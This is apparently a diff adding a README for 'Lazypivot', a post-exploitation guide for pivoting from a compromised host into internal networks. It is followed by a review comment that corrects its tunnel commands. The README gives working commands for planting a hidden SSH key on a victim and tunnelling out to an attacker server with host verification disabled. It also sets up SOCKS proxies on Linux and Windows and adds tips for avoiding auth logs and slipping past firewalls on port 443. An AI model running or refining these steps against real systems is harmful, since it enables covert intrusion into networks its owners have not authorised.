@@ -0,0 +1,61 @@
+# Lazypivot
+Making pivoting into internal networks easier and faster so you can focus on the real fun :)
+
+## Principles
+The idea is to executa a socks5 server on the compromised target and forward the local exposed port remotely via SSH.
+A remote server or any other mean of exposing a port on the internet is required. When SSH server is not available there's [antinat](http://www.malsmith.net/antinat/) coming to the rescue.
+
+## Linux
+### Simpler
+On our server
+```
+useradd -m -s /bin/nologin targetname
+ssh-keygen -t ecdsa -f /tmp/sshkey -q -N ""
+mkdir /home/targetname/.ssh
+cp /tmp/sshkey.pub /home/targetname/.ssh/authorized_keys
+chown -R targetname:targetname /home/targetname/.ssh
+chmod 600 /home/targetname/.ssh/authorized_keys
+cat /tmp/sshkey
+```
+
+Copy the content of /tmp/sshkey
+
+On the compromised host
+
+```
+echo "my copied sshkey" >> /tmp/.keyfile
+chmod 600 /tmp/.keyfile
+ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -L 22:127.0.0.1:2222 -i /tmp/.keyfile -fNT targetname@myserver
+```
+
+Now on your server
+
+```
+ssh -D 0.0.0.0:8080 compromiseduser@127.0.0.1 -p 2222 -fNT
+```
+
+### Stealthier
+We can combine the `antinat` proxy with the above procedure in order not to login onn the ssh server and thus writing on the auth logs.
+
+Instead of using with the socks options, upload the provided package and directly forward the `antinat` port.
+## Windows
+
+Upload the package and extract it with 7z.exe.
+
+Start the antinat binary, no admin permissions are required:
+
+```
+antinat.exe -a -cantinat.xml
+```
+
+Forward the antinat port with plink:
+
+```
+plink -ssh -noagent -pw "password" -L 32768:127.0.0.1:8080 targetname@myserver
+```
+
+
+## Tips
+
+ * Make ssh listen on port 443 to be less suspicious and bypass lame firewall rules
+ * [User corkscrew for SSH via HTTP Proxy](https://github.com/bryanpkc/corkscrew)
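Review bot: the "Now on your server" step `ssh -D 0.0.0.0:8080 compromiseduser@127.0.0.1 -p 2222 -fNT` binds an unauthenticated SOCKS proxy on every interface of the server, so anyone who can reach the server on TCP/8080 gets the same path into the tunnel; bind it to `127.0.0.1:8080` (or firewall the port) and document that choice. The two Linux commands also disagree about tunnel direction: `-L 22:127.0.0.1:2222` on the compromised host binds port 22 locally (which needs root and collides with a running sshd) and forwards it to the server, while the following step expects to reach the compromised host's sshd by connecting to `127.0.0.1:2222` on the server, which is what a remote forward (`-R 2222:127.0.0.1:22`) provides; the plink line `-L 32768:127.0.0.1:8080` has the same inconsistency with "Forward the antinat port". `-pw "password"` on the plink command line leaves the password visible in the process list and shell history; the README already generates an SSH key for the Linux flow, so reuse a key here and note that `-o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null` disables host verification entirely. Minor wording: "executa" should be "execute", "any other mean" should be "any other means", "onn" should be "on", and "User corkscrew" should be "Use corkscrew".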